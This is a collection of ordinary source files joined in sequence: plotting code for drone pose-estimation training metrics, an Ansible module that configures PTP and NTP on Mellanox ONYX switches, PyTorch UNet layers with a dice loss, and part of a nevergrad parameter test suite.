ax = plt.subplot(gs[0, 0])
ax.set_title('x')
plt.plot(epochs, train_losses_x, color='green', label='Training loss')
plt.plot(epochs, valid_losses_x, color='black', label='Validation loss')
plt.legend()
ax = plt.subplot(gs[0, 1])
ax.set_title('y')
plt.plot(epochs, train_losses_y, color='blue', label='Training loss')
plt.plot(epochs, valid_losses_y, color='black', label='Validation loss')
plt.legend()
ax = plt.subplot(gs[1, 0])
ax.set_title('z')
plt.plot(epochs, train_losses_z, color='r', label='Training loss')
plt.plot(epochs, valid_losses_z, color='black', label='Validation loss')
plt.legend()
ax = plt.subplot(gs[1, 1])
ax.set_title('phi')
plt.plot(epochs, train_losses_phi, color='m', label='Training loss')
plt.plot(epochs, valid_losses_phi, color='black', label='Validation loss')
plt.legend()
plt.subplots_adjust(hspace=0.3)
plt.suptitle('Learning curves')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.savefig(DataVisualization.folderPath + DataVisualization.desc +'LearningCurves.png')
@staticmethod
def PlotMSE(MSE):
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(10, 6))
epochs = range(1, len(MSE) + 1)
MSE = torch.stack(MSE, 0)
x = MSE[:, 0]
x = x.cpu().numpy()
plt.plot(epochs, x, color='green', label='x')
y = MSE[:, 1]
y = y.cpu().numpy()
plt.plot(epochs, y, color='blue', label='y')
z = MSE[:, 2]
z = z.cpu().numpy()
plt.plot(epochs, z, color='r', label='z')
phi = MSE[:, 3]
phi = phi.cpu().numpy()
plt.plot(epochs, phi, color='m', label='phi')
plt.legend()
plt.title('Pose Variables MSE')
plt.xlabel('Epoch')
plt.ylabel('MSE')
plt.xticks(np.arange(0, len(MSE), step=5))
plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'MSE.png')
@staticmethod
def PlotMAE(MAE):
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(10, 6))
epochs = range(1, len(MAE) + 1)
MAE = torch.stack(MAE, 0)
x = MAE[:, 0]
x = x.cpu().numpy()
plt.plot(epochs, x, color='green', label='x')
y = MAE[:, 1]
y = y.cpu().numpy()
plt.plot(epochs, y, color='blue', label='y')
z = MAE[:, 2]
z = z.cpu().numpy()
plt.plot(epochs, z, color='r', label='z')
phi = MAE[:, 3]
phi = phi.cpu().numpy()
plt.plot(epochs, phi, color='m', label='phi')
plt.legend()
plt.title('Pose Variables MAE')
plt.xlabel('Epoch')
plt.ylabel('MAE')
plt.xticks(np.arange(0, len(MAE), step=5))
plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'MAE.png')
@staticmethod
def PlotR2Score(r2_score):
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(10, 6))
epochs = range(1, len(r2_score) + 1)
r2_score = torch.stack(r2_score, 0)
x = r2_score[:, 0]
x = x.cpu().numpy()
plt.plot(epochs, x, color='green', label='x')
y = r2_score[:, 1]
y = y.cpu().numpy()
plt.plot(epochs, y, color='blue', label='y')
z = r2_score[:, 2]
z = z.cpu().numpy()
plt.plot(epochs, z, color='r', label='z')
phi = r2_score[:, 3]
phi = phi.cpu().numpy()
plt.plot(epochs, phi, color='m', label='phi')
plt.legend()
plt.title('Pose Variables R2 Score')
plt.xlabel('Epoch')
plt.ylabel('R2 Score')
plt.xticks(np.arange(0, len(r2_score), step=5))
plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'Rsq.png')
@staticmethod
def PlotGTandEstimationVsTime(gt_labels, predictions):
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(20, 12))
plt.margins(0.1)
gt_labels = torch.stack(gt_labels, 0)
predictions = torch.stack(predictions, 0)
gt_labels = gt_labels.cpu().numpy()
gt_labels = np.reshape(gt_labels, (-1, 4))
predictions = predictions.cpu().numpy()
predictions = np.reshape(predictions, (-1, 4))
samples = len(gt_labels[:, 0])
samples = range(1, samples+1)
gs = gridspec.GridSpec(2, 2)
ax = plt.subplot(gs[0, 0])
ax.set_title('x')
x_gt = gt_labels[:, 0]
x_pred = predictions[:, 0]
plt.plot(samples, x_gt, color='green', label='GT')
plt.plot(samples, x_pred, color='black', label='Prediction')
plt.legend()
ax = plt.subplot(gs[0, 1])
ax.set_title('y')
y_gt = gt_labels[:, 1]
y_pred = predictions[:, 1]
plt.plot(samples, y_gt, color='blue', label='GT')
plt.plot(samples, y_pred, color='black', label='Prediction')
plt.legend()
ax = plt.subplot(gs[1, 0])
ax.set_title('z')
z_gt = gt_labels[:, 2]
z_pred = predictions[:, 2]
plt.plot(samples, z_gt, color='r', label='GT')
plt.plot(samples, z_pred, color='black', label='Prediction')
plt.legend()
ax = plt.subplot(gs[1, 1])
ax.set_title('phi')
phi_gt = gt_labels[:, 3]
phi_pred = predictions[:, 3]
plt.plot(samples, phi_gt, color='m', label='GT')
plt.plot(samples, phi_pred, color='black', label='Prediction')
plt.legend()
plt.subplots_adjust(hspace=0.3)
plt.suptitle('Ground Truth and Predictions vs time')
plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'GTandPredVsTime.png')
@staticmethod
def PlotBebopandHimaxVsTime(bebop_output, himax_output):
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(20, 12))
plt.margins(0.1)
#gt_labels = torch.stack(gt_labels, 0)
#predictions = torch.stack(predictions, 0)
#gt_labels = gt_labels.cpu().numpy()
#gt_labels = np.reshape(gt_labels, (-1, 4))
#predictions = predictions.cpu().numpy()
#predictions = np.reshape(predictions, (-1, 4))
samples = len(bebop_output[:, 0])
samples = range(1, samples + 1)
gs = gridspec.GridSpec(2, 2)
ax = plt.subplot(gs[0, 0])
ax.set_title('x')
x_gt = bebop_output[:, 0]
x_pred = himax_output[:, 0]
plt.plot(samples, x_gt, color='green', label='bebop_output')
plt.plot(samples, x_pred, color='black', label='himax_output')
plt.legend()
ax = plt.subplot(gs[0, 1])
ax.set_title('y')
y_gt = bebop_output[:, 1]
y_pred = himax_output[:, 1]
plt.plot(samples, y_gt, color='blue', label='bebop_output')
plt.plot(samples, y_pred, color='black', label='himax_output')
plt.legend()
ax = plt.subplot(gs[1, 0])
ax.set_title('z')
z_gt = bebop_output[:, 2]
z_pred = himax_output[:, 2]
plt.plot(samples, z_gt, color='r', label='bebop_output')
plt.plot(samples, z_pred, color='black', label='himax_output')
plt.legend()
ax = plt.subplot(gs[1, 1])
ax.set_title('phi')
phi_gt = bebop_output[:, 3]
phi_pred = himax_output[:, 3]
plt.plot(samples, phi_gt, color='m', label='bebop_output')
plt.plot(samples, phi_pred, color='black', label='himax_output')
plt.legend()
plt.subplots_adjust(hspace=0.3)
plt.suptitle('bebop output and himax output vs time')
plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'bebopandhimaxVsTime.png')
@staticmethod
def DisplayPlots():
plt.show()
@staticmethod
def PlotGTVsEstimation(gt_labels, predictions):
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(20, 12))
gt_labels = torch.stack(gt_labels, 0)
predictions = torch.stack(predictions, 0)
gt_labels = gt_labels.cpu().numpy()
gt_labels = np.reshape(gt_labels, (-1, 4))
predictions = predictions.cpu().numpy()
predictions = np.reshape(predictions, (-1, 4))
gs = gridspec.GridSpec(2, 2)
ax = plt.subplot(gs[0, 0])
ax.set_title('x')
ax.set_xmargin(0.2)
x_gt = gt_labels[:, 0]
x_pred = predictions[:, 0]
plt.scatter(x_gt, x_pred, color='green', marker='o')
plt.plot(x_gt, x_gt, color='black', linestyle='--')
plt.legend()
ax = plt.subplot(gs[0, 1])
ax.set_title('y')
ax.set_xmargin(0.2)
y_gt = gt_labels[:, 1]
y_pred = predictions[:, 1]
plt.scatter(y_gt, y_pred, color='blue', marker='o')
plt.plot(y_gt, y_gt, color='black', linestyle='--')
plt.legend()
ax = plt.subplot(gs[1, 0])
ax.set_title('z')
ax.set_xmargin(0.2)
z_gt = gt_labels[:, 2]
z_pred = predictions[:, 2]
plt.scatter(z_gt, z_pred, color='r', marker='o')
plt.plot(z_gt, z_gt, color='black', linestyle='--')
plt.legend()
ax = plt.subplot(gs[1, 1])
ax.set_title('phi')
ax.set_xmargin(0.2)
phi_gt = gt_labels[:, 3]
phi_pred = predictions[:, 3]
plt.scatter(phi_gt, phi_pred, color='m', marker='o')
plt.plot(phi_gt, phi_gt, color='black', linestyle='--')
plt.legend()
plt.subplots_adjust(hspace=0.3)
plt.suptitle('Ground Truth vs Predictions')
plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'GTvsPred.png')
@staticmethod
def DisplayFrameAndPose(frame, gt_labels, predictions):
#DataVisualization.figure_counter += 1
fig = plt.figure(666, figsize=(10, 6))
w = 20
h = 12
bar_length = h - 2
offset_x = int((w-bar_length)/2)
ax1 = plt.subplot2grid((h, w), (0, offset_x), colspan=bar_length)
ax1.set_title('x')
ax1.xaxis.tick_top()
x_gt = gt_labels[0]
x_pred = predictions[0]
ax1.set_xlim([0, 4])
ax1.set_ylim([-0.5, 0.5])
ax1.set_yticklabels([])
plt.scatter(x_gt, -0.05, color='green', label='GT', s=100)
plt.scatter(x_pred, 0.05, color='blue', label='Prediction', s=100)
ax2 = plt.subplot2grid((h, w), (1, 0), rowspan=bar_length)
ax2.set_title('y')
y_gt = gt_labels[1]
y_pred = predictions[1]
ax2.set_ylim([-1, 1])
ax2.set_xlim([-0.5, 0.5])
ax2.set_xticklabels([])
plt.scatter(-0.05, y_gt, color='green', label='GT', s=100)
plt.scatter(0.05, y_pred, color='blue', label='Prediction', s=100)
ax3 = plt.subplot2grid((h, w), (1, 1), rowspan=bar_length, colspan=(w-2))
ax3.axis('off')
frame = frame.transpose(1, 2, 0)
frame = frame.astype(np.uint8)
plt.imshow(frame)
ax4 = plt.subplot2grid((h, w), (1, w-1), rowspan=bar_length)
ax4.set_title('z')
z_gt = gt_labels[2]
z_pred = predictions[2]
ax4.yaxis.tick_right()
ax4.set_ylim([-1, 1])
ax4.set_xlim([-0.5, 0.5])
ax4.set_xticklabels([])
plt.scatter(-0.05, z_gt, color='green', label='GT', s=100)
plt.scatter(0.05, z_pred, color='blue', label='Prediction', s=100)
ax5 = plt.subplot2grid((h, w), (h-1, offset_x), colspan=bar_length)
ax5.set_title('phi')
phi_gt = gt_labels[3]
phi_pred = predictions[3]
ax5.set_xlim([-2, 2])
ax5.set_ylim([-0.5, 0.5])
ax5.set_yticklabels([])
plt.scatter(phi_gt, -0.05, color='green', label='GT', s=100)
plt.scatter(phi_pred, 0.05, color='blue', label='Prediction', s=100)
plt.subplots_adjust(hspace=1.5)
plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
return fig
# plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'GTandPredandPose.png')
@staticmethod
def CoolDroneStuff(frame, gt_labels, predictions):
fig = plt.figure(888, figsize=(15, 5))
img = mpimg.imread('minidrone.jpg')
frame = frame.transpose(1, 2, 0)
frame = frame.astype(np.uint8)
h = 5
w = 15
x_gt = gt_labels[0]
x_pred = predictions[0]
y_gt = gt_labels[1]
y_pred = predictions[1]
z_gt = gt_labels[2]
z_pred = predictions[2]
phi_gt = gt_labels[3] - np.pi/2
phi_pred = predictions[3] - np.pi/2
str1 = "x_gt={:05.3f}, y_gt={:05.3f}, z_gt={:05.3f}, phi_gt={:05.3f}".format(x_gt, y_gt, z_gt, phi_gt)
str2 = "x_pr={:05.3f}, y_pr={:05.3f}, z_pr={:05.3f}, phi_pr={:05.3f}".format(x_pred, y_pred, z_pred, phi_pred)
ax0 = plt.subplot2grid((h, w), (0, 0), colspan=6)
ax0.axis('off')
ax0.text(0, 1.5, str1, fontsize=10)
ax0.text(0, 1, str2, fontsize=10)
ax1 = plt.subplot2grid((h, w), (1, 0), colspan=7, rowspan=4)
ax1.set_title('Relative Pose (x,y)')
ax1.set_xlim([-3, 3])
ax1.set_ylim([0, 3])
ax1.yaxis.set_ticks([0, 1.5, 3]) # set y-ticks
ax1.xaxis.set_ticks([-3.0, -1.5, 0, 1.5, 3.0]) # set y-ticks
ax1.xaxis.tick_top() # and move the X-Axis
ax1.yaxis.tick_left() # remove right y-Ticks
ax1.spines['right'].set_visible(False)
ax1.spines['bottom'].set_visible(False)
trianglex = [3, 0, -3, 3]
triangley = [3, 0, 3, 3]
plt.fill(trianglex, triangley, facecolor='lightskyblue')
plt.plot(y_gt, x_gt, color='green', label='GT', linestyle='None', marker='o', markersize=10)
plt.plot(y_pred, x_pred, color='blue', label='Prediction', linestyle='None', marker='o', markersize=10)
ax1.arrow(y_gt, x_gt, np.cos(phi_gt), np.sin(phi_gt), head_width=0.05, head_length=0.05, color='green')
ax1.arrow(y_pred, x_pred, np.cos(phi_pred), np.sin(phi_pred), head_width=0.05, head_length=0.05, color='blue')
plt.legend(loc='lower right', bbox_to_anchor=(0.8, 0.2, 0.25, 0.25))
ax2 = plt.subplot2grid((h, w), (1, 7), rowspan=4)
ax2.set_title('Relative z', pad=20)
ax2.yaxis.tick_right()
ax2.set_ylim([-1, 1])
ax2.set_xlim([-0.5, 0.5])
ax2.set_xticklabels([])
ax2.yaxis.set_ticks([-1, 0, 1]) # set y-ticks
ax2.xaxis.set_ticks_position('none')
plt.scatter(-0.05, z_gt, color='green', label='GT', s=100)
plt.scatter(0.05, z_pred, color='blue', label='Prediction', s=100)
ax3 = plt.subplot2grid((h, w), (1, 8), rowspan=4, colspan=7)
ax3.set_title('Frame', pad=25)
ax3.axis('off')
plt.imshow(frame)
plt.subplots_adjust(wspace=1.5)
newax = fig.add_axes([0.248, 0.0, 0.1, 0.1], anchor='S')
newax.imshow(img)
newax.axis('off')
@staticmethod
def DisplayVideoFrame(frame):
frame = frame.transpose(1, 2, 0)
frame = frame.astype(np.uint8)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
cv2.imshow('frame', frame)
cv2.waitKey(10)
@staticmethod
def DisplayDatasetVideo(data):
length = len(data)
for i in range(0, length):
DataVisualization.DisplayVideoFrame(data[i])
|
the-stack_0_25266
|
#!/usr/bin/python
#
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: onyx_ptp_global
author: "Anas Badaha (@anasb)"
short_description: Configures PTP Global parameters
description:
- This module provides declarative management of PTP Global configuration
on Mellanox ONYX network devices.
notes:
- Tested on ONYX 3.6.8130
- ptp and ntp protocols cannot be enabled at the same time
options:
ptp_state:
description:
- PTP state.
choices: ['enabled', 'disabled']
default: enabled
ntp_state:
description:
- NTP state.
choices: ['enabled', 'disabled']
domain:
description:
- "set PTP domain number Range 0-127"
primary_priority:
description:
- "set PTP primary priority Range 0-225"
secondary_priority:
description:
- "set PTP secondary priority Range 0-225"
'''
EXAMPLES = """
- name: Configure PTP
onyx_ptp_global:
ntp_state: enabled
ptp_state: disabled
domain: 127
primary_priority: 128
secondary_priority: 128
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device.
returned: always
type: list
sample:
- no ntp enable
- protocol ptp
- ptp domain 127
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.mellanox.onyx.plugins.module_utils.network.onyx.onyx import show_cmd
from ansible_collections.mellanox.onyx.plugins.module_utils.network.onyx.onyx import BaseOnyxModule
class OnyxPtpGlobalModule(BaseOnyxModule):
def init_module(self):
""" initialize module
"""
element_spec = dict(
ntp_state=dict(choices=['enabled', 'disabled']),
ptp_state=dict(choices=['enabled', 'disabled'], default='enabled'),
domain=dict(type=int),
primary_priority=dict(type=int),
secondary_priority=dict(type=int)
)
argument_spec = dict()
argument_spec.update(element_spec)
self._module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True)
def get_required_config(self):
module_params = self._module.params
self._required_config = dict(module_params)
self._validate_param_values(self._required_config)
def _validate_param_values(self, obj, param=None):
super(OnyxPtpGlobalModule, self).validate_param_values(obj, param)
if obj['ntp_state'] == 'enabled' and obj['ptp_state'] == 'enabled':
self._module.fail_json(msg='PTP state and NTP state cannot be enabled at the same time')
def validate_domain(self, value):
if value and not 0 <= int(value) <= 127:
self._module.fail_json(msg='domain must be between 0 and 127')
def validate_primary_priority(self, value):
if value and not 0 <= int(value) <= 255:
self._module.fail_json(msg='Primary Priority must be between 0 and 255')
def validate_secondary_priority(self, value):
if value and not 0 <= int(value) <= 255:
self._module.fail_json(msg='Secondary Priority must be between 0 and 255')
def _set_ntp_config(self, ntp_config):
ntp_config = ntp_config[0]
if not ntp_config:
return
ntp_state = ntp_config.get('NTP enabled')
if ntp_state == "yes":
self._current_config['ntp_state'] = "enabled"
else:
self._current_config['ntp_state'] = "disabled"
def _set_ptp_config(self, ptp_config):
if ptp_config is None:
self._current_config['ptp_state'] = 'disabled'
else:
self._current_config['ptp_state'] = 'enabled'
self._current_config['domain'] = int(ptp_config['Domain'])
self._current_config['primary_priority'] = int(ptp_config['Priority1'])
self._current_config['secondary_priority'] = int(ptp_config['Priority2'])
def _show_ntp_config(self):
cmd = "show ntp configured"
return show_cmd(self._module, cmd, json_fmt=True, fail_on_error=False)
def _show_ptp_config(self):
cmd = "show ptp clock"
return show_cmd(self._module, cmd, json_fmt=True, fail_on_error=False)
def load_current_config(self):
self._current_config = dict()
ntp_config = self._show_ntp_config()
self._set_ntp_config(ntp_config)
ptp_config = self._show_ptp_config()
self._set_ptp_config(ptp_config)
def generate_commands(self):
ntp_state = self._required_config.get("ntp_state")
if ntp_state == "enabled":
self._enable_ntp()
elif ntp_state == "disabled":
self._disable_ntp()
ptp_state = self._required_config.get("ptp_state", "enabled")
if ptp_state == "enabled":
self._enable_ptp()
else:
self._disable_ptp()
domain = self._required_config.get("domain")
if domain is not None:
curr_domain = self._current_config.get("domain")
if domain != curr_domain:
self._commands.append('ptp domain %d' % domain)
primary_priority = self._required_config.get("primary_priority")
if primary_priority is not None:
curr_primary_priority = self._current_config.get("primary_priority")
if primary_priority != curr_primary_priority:
self._commands.append('ptp priority1 %d' % primary_priority)
secondary_priority = self._required_config.get("secondary_priority")
if secondary_priority is not None:
curr_secondary_priority = self._current_config.get("secondary_priority")
if secondary_priority != curr_secondary_priority:
self._commands.append('ptp priority2 %d' % secondary_priority)
def _enable_ptp(self):
curr_ptp_state = self._current_config['ptp_state']
if curr_ptp_state == 'disabled':
self._commands.append('protocol ptp')
def _disable_ptp(self):
curr_ptp_state = self._current_config['ptp_state']
if curr_ptp_state == 'enabled':
self._commands.append('no protocol ptp')
def _enable_ntp(self):
curr_ntp_state = self._current_config.get('ntp_state')
if curr_ntp_state == 'disabled':
self._commands.append('ntp enable')
def _disable_ntp(self):
curr_ntp_state = self._current_config['ntp_state']
if curr_ntp_state == 'enabled':
self._commands.append('no ntp enable')
def main():
""" main entry point for module execution
"""
OnyxPtpGlobalModule.main()
if __name__ == '__main__':
main()
|
the-stack_0_25270
|
# Copyright (C) 2020-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
"""You may copy this file as the starting point of your own model."""
import torch
import torch.nn as nn
import torch.nn.functional as F
def soft_dice_loss(output, target):
"""Dice loss function."""
num = target.size(0)
m1 = output.view(num, -1)
m2 = target.view(num, -1)
intersection = (m1 * m2)
score = 2. * (intersection.sum(1) + 1) / (m1.sum(1) + m2.sum(1) + 1)
score = 1 - score.sum() / num
return score
def soft_dice_coef(output, target):
"""Dice coef metric function."""
num = target.size(0)
m1 = output.view(num, -1)
m2 = target.view(num, -1)
intersection = (m1 * m2)
score = 2. * (intersection.sum(1) + 1) / (m1.sum(1) + m2.sum(1) + 1)
return score.sum()
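# Worked example (hypothetical helper): because of the +1 smoothing terms, a perfect
# binary match on a 2x2 mask scores 2*(4+1)/(4+4+1) = 10/9 per sample, so the loss
# can dip slightly below zero.
def _dice_example():
    target = torch.ones(1, 1, 2, 2)
    output = target.clone()
    coef = soft_dice_coef(output, target)  # tensor(10/9), roughly 1.111
    loss = soft_dice_loss(output, target)  # 1 - 10/9, roughly -0.111
    return coef, loss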
class DoubleConv(nn.Module):
"""Convolutions with BN and activation."""
def __init__(self, in_ch, out_ch):
"""Initialize.
Args:
in_ch: number of input channels
out_ch: number of output channels
"""
super(DoubleConv, self).__init__()
self.in_ch = in_ch
self.out_ch = out_ch
self.conv = nn.Sequential(
nn.Conv2d(in_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch),
nn.ReLU(inplace=True),
nn.Conv2d(out_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch),
nn.ReLU(inplace=True)
)
def forward(self, x):
"""Run forward."""
x = self.conv(x)
return x
class Down(nn.Module):
"""UNet downscaling. MaxPool with double convolution."""
def __init__(self, in_ch, out_ch):
"""Initialize.
Args:
in_ch: number of input channels
out_ch: number of output channels
"""
super(Down, self).__init__()
self.mpconv = nn.Sequential(
nn.MaxPool2d(2),
DoubleConv(in_ch, out_ch))
def forward(self, x):
"""Run forward."""
x = self.mpconv(x)
return x
class Up(nn.Module):
"""UNet upscaling."""
def __init__(self, in_ch, out_ch):
"""Initialize.
Args:
in_ch: number of input channels
out_ch: number of output channels
"""
super(Up, self).__init__()
self.in_ch = in_ch
self.out_ch = out_ch
self.up = nn.ConvTranspose2d(in_ch, in_ch // 2, 2, stride=2)
self.conv = DoubleConv(in_ch, out_ch)
def forward(self, x1, x2):
"""Run forward."""
x1 = self.up(x1)
diff_y = x2.size()[2] - x1.size()[2]
diff_x = x2.size()[3] - x1.size()[3]
x1 = F.pad(x1, (diff_x // 2, diff_x - diff_x // 2,
diff_y // 2, diff_y - diff_y // 2))
x = torch.cat([x2, x1], dim=1)
x = self.conv(x)
return x
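# Minimal shape check (hypothetical helper): one Down/Up pair around DoubleConv
# reproduces the encoder/decoder skip-connection pattern these blocks are built for.
def _unet_blocks_shape_check():
    inc = DoubleConv(1, 16)
    down = Down(16, 32)
    up = Up(32, 16)
    x = torch.randn(1, 1, 64, 64)
    x1 = inc(x)       # (1, 16, 64, 64)
    x2 = down(x1)     # (1, 32, 32, 32)
    out = up(x2, x1)  # upsample, pad, concat the skip, convolve -> (1, 16, 64, 64)
    assert out.shape == (1, 16, 64, 64)
    return out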
|
the-stack_0_25271
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import pickle
import typing as tp
import pytest
import numpy as np
from nevergrad.common import errors
from . import parameter as par
def test_array_basics() -> None:
var1 = par.Array(shape=(1,))
var2 = par.Array(shape=(2, 2))
d = par.Dict(var1=var1, var2=var2, var3=12)
data = d.get_standardized_data(reference=d)
assert data.size == 5
d.set_standardized_data(np.array([1, 2, 3, 4, 5]))
assert var1.value[0] == 1
np.testing.assert_array_equal(d.value["var2"], np.array([[2, 3], [4, 5]]))
# setting value on arrays
with pytest.raises(ValueError):
var1.value = np.array([1, 2])
with pytest.raises(TypeError):
var1.value = 4 # type: ignore
var1.value = np.array([2])
representation = repr(d)
assert "Dict(var1" in representation
d.set_name("blublu")
representation = repr(d)
assert "blublu:{'var1" in representation
@pytest.mark.parametrize( # type: ignore
"param",
[
par.Dict(truc=12),
par.Tuple(),
par.Instrumentation(12),
],
)
def test_empty_parameters(param: par.Dict) -> None:
assert not param.dimension
analysis = par.helpers.analyze(param)
assert analysis.continuous
assert analysis.deterministic
assert param.descriptors.continuous
assert param.descriptors.deterministic
def _true(*args: tp.Any, **kwargs: tp.Any) -> bool: # pylint: disable=unused-argument
return True
@pytest.mark.parametrize( # type: ignore
"param",
[
par.Array(shape=(2, 2)),
par.Array(init=np.ones(3)).set_mutation(sigma=3, exponent=5),
par.Scalar(),
par.Scalar(1.0).set_mutation(exponent=2.0),
par.Dict(blublu=par.Array(shape=(2, 3)), truc=12),
par.Dict(scalar=par.Scalar(), const_array=np.array([12.0, 12.0]), const_list=[3, 3]),
par.Tuple(par.Array(shape=(2, 3)), 12),
par.Instrumentation(par.Array(shape=(2,)), nonhash=[1, 2], truc=par.Array(shape=(1, 3))),
par.Choice([par.Array(shape=(2,)), "blublu"]),
par.Choice([1, 2], repetitions=2),
par.TransitionChoice([par.Array(shape=(2,)), par.Scalar()]),
par.TransitionChoice(["a", "b", "c"], transitions=(0, 2, 1), repetitions=4),
],
)
def test_parameters_basic_features(param: par.Parameter) -> None:
check_parameter_features(param)
check_parameter_freezable(param)
# pylint: disable=too-many-statements
def check_parameter_features(param: par.Parameter) -> None:
seed = np.random.randint(2 ** 32, dtype=np.uint32)
print(f"Seeding with {seed} from reproducibility.")
np.random.seed(seed)
assert isinstance(param.name, str)
# assert param._random_state is None # TODO no more true because of layers :s
assert param.generation == 0
child = param.spawn_child()
assert isinstance(child, type(param))
assert child.heritage["lineage"] == param.uid
assert child.generation == 1
assert not np.any(param.get_standardized_data(reference=param))
assert not np.any(child.get_standardized_data(reference=child))
assert not np.any(child.get_standardized_data(reference=param))
assert child.name == param.name
assert param._random_state is not None
assert child.random_state is param.random_state
assert child.uid != param.uid
assert child.parents_uids == [param.uid]
mutable = True
try:
child.mutate()
except errors.UnsupportedParameterOperationError:
mutable = False
else:
assert np.any(child.get_standardized_data(reference=param))
param.set_name("blublu")
child_hash = param.spawn_child()
assert child_hash.name == "blublu"
param.value = child.value
try:
assert param.get_value_hash() == child.get_value_hash()
except AssertionError:
# with approximations, value hash may return something slightly different
# so let's try a relaxed version
param2 = param.spawn_child()
param2.value = child.value
assert param2.get_value_hash() == param.get_value_hash()
if isinstance(param, par.Data):
assert param.get_value_hash() != child_hash.get_value_hash()
child_hash.value = param.value
np.testing.assert_almost_equal(
param.get_standardized_data(reference=child), np.zeros(param.dimension) # type: ignore
)
if mutable:
param.recombine(child, child)
param.recombine() # empty should work, for simplicity's sake
# constraints
param.register_cheap_constraint(_true)
with pytest.warns(UserWarning):
param.register_cheap_constraint(lambda *args, **kwargs: False)
child2 = param.spawn_child(param.value) # just checking new_value
assert child.satisfies_constraints()
assert not param.satisfies_constraints()
assert not child2.satisfies_constraints()
# array to and from with hash
data = param.get_standardized_data(reference=child2)
param.set_standardized_data(data, reference=child2)
np.testing.assert_array_almost_equal(param.get_standardized_data(reference=child2), data)
# picklable
string = pickle.dumps(child)
pickle.loads(string)
# sampling
samp_param = param.sample()
assert samp_param.uid == samp_param.heritage["lineage"]
# set descriptor
assert param.descriptors.deterministic_function
assert param.function.deterministic
param.descriptors.deterministic_function = False
assert not param.descriptors.deterministic_function
assert not param.function.deterministic
#
assert param.descriptors.non_proxy_function
assert not param.function.proxy
param.descriptors.non_proxy_function = False
assert not param.descriptors.non_proxy_function
assert param.function.proxy
#
descr_child = param.spawn_child()
assert not descr_child.descriptors.deterministic_function
assert not descr_child.descriptors.non_proxy_function
def check_parameter_freezable(param: par.Parameter) -> None:
param.freeze()
value = param.value
data = param.get_standardized_data(reference=param)
child = param.spawn_child()
child.mutate()
child.recombine(param)
with pytest.raises(RuntimeError):
param.value = value
with pytest.raises(RuntimeError):
param.set_standardized_data(data)
child.set_standardized_data(data, reference=param)
with pytest.raises(RuntimeError):
param.recombine(child)
@pytest.mark.parametrize( # type: ignore
"param,name",
[
(par.Array(shape=(2, 2)), "Array{(2,2)}"),
(par.Tuple(12), "Tuple(12)"),
(par.Dict(constant=12), "Dict(constant=12)"),
(par.Scalar(), "Scalar[sigma=Scalar{exp=2.03}]"),
(
par.Log(lower=3.2, upper=12.0, exponent=1.5),
"Log{Cl(2.868682869489701,6.128533874054364,b),exp=1.50}",
),
(par.Scalar().set_integer_casting(), "Scalar{Int}[sigma=Scalar{exp=2.03}]"),
(
par.Instrumentation(par.Array(shape=(2,)), string="blublu", truc="plop"),
"Instrumentation(Tuple(Array{(2,)}),Dict(string=blublu,truc=plop))",
),
(par.Choice([1, 12]), "Choice(choices=Tuple(1,12),indices=Array{(1,2),SoftmaxSampling})"),
(
par.Choice([1, 12], deterministic=True),
"Choice(choices=Tuple(1,12),indices=Array{(1,2),SoftmaxSampling{det}})",
),
(
par.TransitionChoice([1, 12]),
"TransitionChoice(choices=Tuple(1,12),indices=Array{Cd(0,2),Add,Int},transitions=[1. 1.])",
),
],
)
def test_parameter_names(param: par.Parameter, name: str) -> None:
assert param.name == name
@pytest.mark.parametrize( # type: ignore
"param,continuous,deterministic,ordered",
[
(par.Array(shape=(2, 2)), True, True, True),
(par.Choice([True, False]), True, False, False),
(par.Choice([True, False], deterministic=True), False, True, False),
(par.Choice([True, par.Scalar().set_integer_casting()]), False, False, False),
(
par.Dict(constant=12, data=par.Scalar().set_integer_casting()),
False,
True,
True,
),
],
)
def test_parameter_analysis(
param: par.Parameter, continuous: bool, deterministic: bool, ordered: bool
) -> None:
analysis = par.helpers.analyze(param)
assert analysis.continuous == continuous
assert analysis.deterministic == deterministic
assert analysis.ordered == ordered
assert param.descriptors.continuous == continuous
assert param.descriptors.deterministic == deterministic
assert param.descriptors.ordered == ordered
def test_instrumentation() -> None:
inst = par.Instrumentation(par.Array(shape=(2,)), string="blublu", truc=par.Array(shape=(1, 3)))
inst.mutate()
assert len(inst.args) == 1
assert len(inst.kwargs) == 2
scal = par.Scalar()
with pytest.raises(ValueError):
inst = par.Instrumentation(scal, blublu=scal)
assert set(inst[1]) == {"string", "truc"} # type: ignore
def test_scalar_and_mutable_sigma() -> None:
param = par.Scalar(init=1.0, mutable_sigma=True).set_mutation(exponent=2.0, sigma=5)
assert param.value == 1
data = param.get_standardized_data(reference=param)
assert data[0] == 0.0
param.set_standardized_data(np.array([-0.2]))
assert param.value == 0.5
assert param.sigma.value == pytest.approx(5)
param.mutate()
assert param.sigma.value != pytest.approx(5)
param.set_integer_casting()
assert isinstance(param.value, int)
def test_array_recombination() -> None:
